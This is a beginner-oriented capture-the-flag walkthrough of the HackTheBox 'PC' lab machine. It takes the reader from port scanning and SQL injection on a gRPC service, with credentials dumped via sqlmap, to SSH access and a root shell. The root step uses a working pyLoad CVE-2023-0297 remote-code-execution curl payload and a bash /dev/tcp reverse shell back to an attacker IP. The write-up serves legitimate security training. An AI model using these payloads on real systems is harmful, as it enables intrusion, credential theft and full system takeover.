# PC - HackTheBox Machine

### This is one of the most beginner-friendly blog ever!! Or That's what the intention is :|

---

For better readability, turn the dark mode on ( available in the top right corner ):

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697695495242/f3e2b3d3-6029-4545-bd25-37dd87aa7a89.png align="center")

---

Connect with Hack The Box using your OpenVPN file, then spawn the PC machine.

Once it's spawned, ping its IP. Then you're good to go.

---

# Mapping

---

Let's start by running a simple Nmap scan:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697245089176/790c0481-8347-42cc-ba16-3cef353fc2e1.png align="center")

Only SSH appears open, nmap's simple scan only scans for the first 1000 ports. So let's try something different.

Let's run it with a default script (-sC ):

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697245156742/35c5f956-b2fb-4c6b-9406-48dfff618d8f.png align="center")

The scan too scanned only the first 1000 ports.  
Okay, let's scan all the ports now, I didn't use timing template but you should use it to make your scan faster.

* The use of timing templates to make your scans fast is acceptable in environments like these ( HackTheBox, TryHackMe and stuff ) but don't do it on real web apps or take proper cautions as it's going to make your scan way too aggressive and loud.
    
* Anyways, use either -T4 or -T5, the higher the number, the more aggressive and fast it's going to be.
    

```bash
sudo nmap -p0-65535 10.10.11.214 -v -T4

# Don't just copy the commands, understand them!!
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697245246184/d40471e0-7587-46b9-b377-686a23f61a25.png align="center")

Now we've found one new port open in this scan. GOOD!!

If you search it, you'll see that this port is default for gRPC service.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697455011246/ff7ab15b-5dd2-4b57-8639-4f835165b381.png align="center")

Source of the info: [follow the link here](https://www.h3c.com/en/d_202207/1647892_294551_0.htm)

But you can't directly just access this using IP:port ( socket ):

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697455203088/a72a46d5-fb73-487a-9590-49b24127b64c.png align="center")

We need a special tool that supports it:

* two of which are:
    
    * grpcui ( for ui ) and
        
    * grpcurl ( for command line )
        

We'll be using grpcui along with Burp Suite.

source: [https://medium.com/@ibm\_ptc\_security/grpc-security-series-part-3-c92f3b687dd9](https://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9)

Go to grpcui's github repo:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697453488779/24d6865c-3ffb-4c18-93de-07473d0916b9.png align="center")

```plaintext
https://github.com/fullstorydev/grpcui
```

Follow the link below, and download the grpcui from "Assets" section of the page that suits your system:

```plaintext
https://github.com/fullstorydev/grpcui/releases
```

unzip it:

```bash
tar xvf grpcui_1.3.2_linux_x86_64.tar.gz
or 
unzip grpcui_1.3.2_linux_x86_64.zip
```

Then run the following command:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697453781902/4b2fbd8f-dbdb-489a-916a-53fcefc9fd58.png align="center")

```bash
./grpcui --plaintext 10.10.11.214:50051
```

As soon as you run this, the web form will open up in your browser, the one that has been mentioned in the GitHub screenshot that I attached above in the screenshot:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697453897588/023dba74-b91f-40f8-8f25-fc1a39890364.png align="center")

So Grpcui is now running on our own machine at 127.0.0.1:37551, using which we are connected to the PC Machine on port 50051, the one that the Nmap found open but was unable to identify the service it is running. That now we do though, it's gRPC.

In Case you are curious to learn about gRPC in detail:

---

### Optional ( if you want to learn about gRPC ):

* amazing explainer, [long video](https://www.youtube.com/watch?v=Yw4rkaTc0f8)
    
* a [short intro](https://youtu.be/XRXTsQwyZSU?si=f7GjH4JXE7aMepqu)
    

---

# Understanding the flow of this Web Form ( with burp suite ) :

---

I have the web form open in my **Burp Suite** browser so that every request and response gets recorded in Proxy HTTP History.

This is helpful as I can visit all the requests and responses whenever I'd like and will be able to grab some information that might be useful for another function of the form.

Like this:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697470603719/8b49b68f-6ce9-43bd-862f-e31756c53707.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697470706324/b143d8bf-53fc-4788-8344-02de58b786ea.png align="center")

Now if you look into the web UI:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697464190681/9944efc6-ba6c-4e34-a078-e4a3c6185f6f.png align="center")

Here, you can do three operations; Login, Register a new user and get info.

We first will go on and register a new user.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697469927466/99aae68d-f9ff-4b50-8462-6ab4d406b7c7.png align="center")

Response:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697469913163/57879341-79b1-4704-acae-fa1c25e5ea17.png align="center")

Registered, now let's login:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697469991163/86bbce44-3e09-4dfc-ad6a-136657946760.png align="center")

Response:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697470026197/3d9ea956-1089-42ee-bf45-6d8ee18f156e.png align="center")

* We get a user id and a token for that user. This is what we can use to get info ( the third method in the Method name ) of the user:
    

```bash
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYW5hbmQiLCJleHAiOjE2OTc0Nzk5Njh9.w5AVsW4Wp7Jy7UN_Fw-2N0GCGVBJ4JUHlNkjg2ZIqkI'

id: 857
#These are user specific, yours will be different so don't copy. Dah!!
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697470183921/3677898b-889a-4506-8e5e-84586d0a2294.png align="center")

Response:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697470258813/f04c84fd-ae6d-43d2-bad5-b7c7e9384ff1.png align="center")

* This would have been captured in the HTTP History of Burp, send this request to the repeater:
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697471889982/ecf5c870-be80-45d3-a6bc-2391505a919d.png align="center")

* Keep burp open for now. We'll come back at it in a bit.
    

---

# Spotting the Vulnerable Point:

---

We saw while walking through the Web Form, we saw we have a lot of points that the user directly interacts with, it's worth checking them all out one by one for any type of vulnerabilities.

The first thing that comes into our head is to input a command of sorts or a query to check if the form has input sanitization in place or not.

Second is that which point retrieves info from the backend. This one is pretty self-explanatory ( the getInfo method does ).

It turns out that, `id in getInfo` method name is vulnerable to SQLi ( SQL injection ).

Now, coming back to the Burp Suite's last request:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697471986887/de90606c-e04b-4947-9561-f445d0552202.png align="center")

So the vulnerable point in this is the id parameter in the body of the request:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697472408463/3bab4d85-b15e-44e1-bce0-00c51c941cd1.png align="center")

# Exploitation:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697473005789/3dbe870f-5305-4ab4-a38f-c1b930971d8f.png align="center")

* We check the vulnerability's existence by putting a wrong id value ( 858, which doesn't exist ) and a condition that will be true always.
    
* As we are using it with or operator, if any of the two values in id is correct, the response would fetch us stuff: ( that is if the point is vulnerable )
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697473191406/be009f6e-c1e7-4b67-84da-83964c5e8731.png align="center")

Response:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697473269887/23a041e1-3361-45fd-a10a-1438aede8346.png align="center")

* It works. The response doesn't contain any error code. On top of that, the message " The admin is working hard to fix the issues. " confirms that our query was executed successfully. If not that, then there's definitely something juicy in here.
    

---

### What would be its response if we provide just a wrong id and no "or 1=1" condition?

* Let's see:
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697473464863/65a433f3-c1c0-4608-a0d7-b4894462b088.png align="center")

* The web Form doesn't respond in the same way, and on top of that, it throws an error code in the response as well.
    
* That confirms that adding "or 1=1" did indeed make the web form behave differently.
    

---

Now let's use this discovered vulnerable point to dig out something sensitive.

But first, we need to find out which database service ( DBMS ) is being used in the backend, you may ask why..

* Different DBMSs have their own specific SQL syntax and behavior. By knowing which DBMS is being used (e.g., MySQL, SQLite etc), we can craft SQL injection payloads that are tailored to that specific system. This makes the exploitation more efficient and effective. And a few other reasons like avoiding false positives etc..
    

SQLmap is one handy tool that can help find in finding this out quickly.

So let's just first save the request from Burp Suite in a file:

* put an asterisk ( \* ) right after the value in id parameter - This lets sqlmap know, that this point is a test injection point.
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697477677072/7708fa86-5083-422c-b965-521c9eb0ed5d.png align="center")

* right-click the request and select save item..
    

I named the file: getInfo-request.txt

Now I tried random dbms names while using sqlmap on this request file, and eventually one hit it successfully. I found the backend DBMS.

```bash
sqlmap -r getInfo-request.txt -p id --dbms=sqlite

# -r = request, -p = parameter
```

SQLMap Output:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697478030865/4571aae4-734d-489f-8d09-7bfe61e91bbb.png align="center")

### Easy Exploitation ( quick way out ):

We can continue using this sqlmap tool and actually dump the backend data just by adding the --dump switch.

```bash
sqlmap -r getInfo-request.txt -p id --dbms=sqlite --dump
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697478437745/5c698286-a1a9-4cfc-9f0c-a4c3e67c36ae.png align="center")

```plaintext
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| HereIsYourPassWord1431 | sau      |
+------------------------+----------+
```

![](https://media.giphy.com/media/SvomFvu98QaVCSGECq/giphy.gif align="center")

---

# Retrieving User Flag:

---

Now we know that the ssh port is open, so let's try and login with ssh using the credential set that we have dumped.

Admin login seems to be restricted.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697479333705/727024cc-dc78-449c-b3f7-9bb7b54d2dcc.png align="center")

Let's try the second set of credentials:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697479401580/cf02143d-f903-4f9e-9882-b5d3bd91a059.png align="center")

### And walah we're in!!

Now let's get our user's flag, which should be straightforward.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697479487149/6f8489c4-d6e2-45c1-8d6f-e09059d05549.png align="center")

---

# Privilege Escalation:

---

Let's run sudo -l.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697513883983/f41a50dd-ec05-4067-9121-542bb84616f8.png align="center")

* The user can't run any root-level commands.
    

While enumerating through the system, we found out that the pc machine is listening at 8000 and 9666. Let me explain this thoroughly but before I do that, you should have a basic idea about port forwarding.

`If you don't already understand the concept of Port forwarding, here's a short and sweet` [`intro video`](https://youtu.be/92b-jjBURkw?si=JxNWekohni5WP1Ar)`.`

If we use the command netstat ( network statics ), is used for network connections and network statistics and helps in troubleshooting network problems.

Let's run a vanilla netstat command:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697536123008/f9683fe0-2a22-4ba7-a471-28ad42d9f5c6.png align="center")

* See, it lists the connection that we have established with this PC machine. SSH and the gRPC Web Form that we used earlier to dump the sau user's password.
    

Anyways, moving on to the command that will list the extra listening ports that our nmap scan didn't identify:

```bash
netstat -tuln

# -t = shows TCP connections
# -u = shows UDP connections
# -l = shows listening sockets only
# -n = shows numbererical ( IP address and ports ) instead of resolving hostname
```

---

Alternatively, you can use the ss command as well to list local listening ports and IP:

```bash
ss -tlpn
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697560839204/bb297e17-7bcd-4e84-b407-7af9e1b07c9e.png align="center")

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697537053191/2927519e-3ea0-422c-8c33-26aad10facd5.png align="center")

### **NOTE:**

In the output, we typically see the state of TCP ports (such as "LISTENING") but no state for UDP ports. This is because UDP is a connectionless protocol, and it doesn't have the same concept of connection states as TCP. A very well-known networking concept.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697545240341/04182ea7-97b8-4f80-9939-3a01f9b51fee.png align="center")

```bash
sau@pc:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State    
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN   
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN   
tcp6       0      0 :::50051                :::*                    LISTEN   
tcp6       0      0 :::22                   :::*                    LISTEN   
udp        0      0 127.0.0.53:53           0.0.0.0:*                        
udp        0      0 0.0.0.0:68              0.0.0.0:*
```

We see quite a few ports ( `8 ports in number` ) that the PC machine is listening at:

* The ones that Nmap was able to identify as well: 22 - one TCP port and one TCP6 port ( SSH ) and 50051 ( gRPC ) - `3 ports`
    
* Then there are the ports that are very common to see in use: 53 - TCP port and UDP port ( DNS - Domain Name System; for IP to Domain name and reverse mapping ) and UDP 68 port ( DHCP - Dynamic Host Configuration Protocol - for ip assignment to a client connecting to internet using DHCP server ) - `3 ports`
    
* Now the ones that we didn't know about: - `2 ports`
    
    * 8000 listening locally on localhost IP ( 127.0.0.1 )
        
    * 9666 listening on all interfaces ( 0.0.0.0 )
        

We'll now be setting up port forwarding. We'll make our machine ( attacker ) listen on a port and connect ( bind ) that port with the remote compromised machine's ( PC ) socket. We're going to do this for both the ports that we found running locally on the compromised machine:

```bash
ssh -L 8000:127.0.0.1:8000 -L 9666:127.0.0.1:9666 sau@10.10.11.214
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697568514422/12a3f6cf-815c-48fd-8e69-f859095f5178.png align="center")

* Ignore the errors, as these ports came in use after this command was executed.
    

This command is setting up two port forwarding using SSH:

* First, the local 8000 port ( attacker's machine ) binds to the compromised system's socket ( 127.0.0.1:8000 ).
    
* Second, the local port 9666 binds to the compromised machine's socket ( 127.0.0.1:9666 )
    

Now to check if our system ( attacker's ) is configured correctly for port forwarding:

```bash
sudo lsof -i :8000
# sudo lsof -i :9666 for the second port
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697568909250/a47d247e-a2f5-4fbf-99c8-828009ecb122.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697568961212/07964b80-c4d2-4445-985a-6fe95167a54c.png align="center")

* We see that our port forwarding has been set up correctly.
    

Now as we've set port forwarding, when we type localhost:8000 in our machine, it should direct us to the remote system's socket instead and hence should be able to see whatever service it's running there.

So let's do that.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697569166305/18f16749-288b-48e9-b6b1-338e5f524d53.png align="center")

* This is what we are presented at localhost:8000 .
    
* I tried accessing localhost:9666, but it gave a 408 error.
    

Let's see what is the privilege that this pyLoad service on the remote system is running with:

```bash
ps aux | grep pyload
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697574328470/be8513a2-9875-48a3-b5b7-07a07401b36c.png align="center")

* We see /usr/bin/python3 /usr/local/bin/pyload is being run by the root user, hence has the privileges of the root. And as we are looking for a way into the system with root privileges, this could be our way in.
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697574469351/789618e6-f48f-4eb6-b2e7-9fbda1c1b0a0.png align="center")

Let's search if there's any exploit for this service "pyLoad" version 0.5.0, that's running on the compromised machine.

* I found a CVE that was released this year 2023 only that mentions pyLoad 0.5.0 as vulnerable to letting attackers run arbitrary code: [CVE-2023-0297](https://nvd.nist.gov/vuln/detail/CVE-2023-0297).
    
* POC: [https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/](https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/)
    
* It goes by the name Pre-auth Remote Code Execution.
    
* The POC mentions that this vulnerability exists in js2py functionality. js2py translates javascript code into python.
    
* It lets us execute arbitrary code.
    

```bash
# POC
curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
    --data-binary $'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%74%6f%75%63%68%20%2f%74%6d%70%2f%70%77%6e%64%22%29;f=function%20f2(){};&passwords=aaaa' \
    $'http://127.0.0.1:8000/flash/addcrypted2'
```

The parameter that's been tampared in POC is <mark>jk</mark> which has a value that appears to be encoded.

Let's try a decoder and decode this long value. You can use any web-based decoder and choose URL decoding. I used Burp Suite Decoder and decoded it as url:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697575881136/20f6096c-7218-424e-83be-a2bfee225b8e.png align="center")

The decoding reveals that it is a Python one-liner:

```bash
pyimport os;os.system("touch /tmp/pwnd")
```

* That creates a file "pwnd" in /tmp directory. That's all that it does.
    

> So in summary, we have pyLoad running with root-level privileges, and on top of that, this POC confirms that have a way to execute commands on the compromised remote system as well.

Now think about what we can do with this, got anything popping up in your head?

* That's right, we can make the remote system run a reverse shell code and gain a root shell. So let's do that.
    

Using SSH connection, we create a script that contains the reverse shell code, in the directory /tmp/ :

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697578272348/58072f16-82c0-4378-9a30-f975042f119b.png align="center")

```bash
import os
os.system("bash -c '/bin/sh -i >& /dev/tcp/10.10.16.4/9001 0>&1'")
```

---

Now I'll listen at 9001 on my local system as the reverse shell code payload contains it:

```bash
nc -lvnp 9001
```

Now up the decoded part of the POC that I showed earlier and alter it to execute this Python script on the remote compromised system:

```bash
pyimport os;os.system("python3 /tmp/pwned.py")
```

Now URL-encode this part and place it in the POC at the place of jk parameter's value:

```bash
# URL-encoded
%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%70%79%74%68%6f%6e%33%20%2f%74%6d%70%2f%70%77%6e%65%64%2e%70%79%22%29
```

```bash
# Modified POC
curl -i -s -k -X $'POST' \
    --data-binary $'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%70%79%74%68%6f%6e%33%20%2f%74%6d%70%2f%70%77%6e%65%64%2e%70%79%22%29;f=function%20f2(){};&passwords=aaaa' \
    $'http://127.0.0.1:8000/flash/addcrypted2'
```

* For some reason, extra request headers ( -H ) in the POC were causing a problem, so removed them.
    

As we have port forwarded, we can run this POC at either our system or on the compromised system. So Let's do it.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697584682896/82f6cbb3-2d81-4edf-9b3f-f8997139f0d2.png align="center")

This will make a request using PyLoad which will let the payload in jk value run on the server. The jk value will trigger the command "python3 /tmp/pwned.py" and run the pwned.py script which contains reverse shell code. Hence we should be able to gain a shell on our local machine's listener at port 9001.

Now our listener should have received a shell:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697584737770/d197f511-38aa-469e-aa3b-81d1af07443f.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697585258325/e66ec9fe-11ba-4cf5-ab3c-27a73d0cec7a.png align="center")

### We have a root shell !!

---

# Retrieving The root Flag:

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1697584784107/a874e757-7dac-4d34-a2a9-fa43b8bc5510.png align="center")

* And we have the root flag now.
    

---

**Suggested Videos:**

Chisel - an alternative to SSH port-forwarding ( you should definitely watch it, it will help you in CTFs and in scenarios when you have a shell and not a SSH on the target ) :

* Chisel [short intro](https://youtu.be/vxW-YZNA1l4?si=fqGddPny1gP0UOVM)
    
* Chisel [John Hammond](https://youtu.be/pbR_BNSOaMk?si=k3ImX1v7Bv40kRmb) long video
    

---

# Peace!!

![](https://media.giphy.com/media/jn7v7WA51dizmXBntd/giphy.gif align="center")
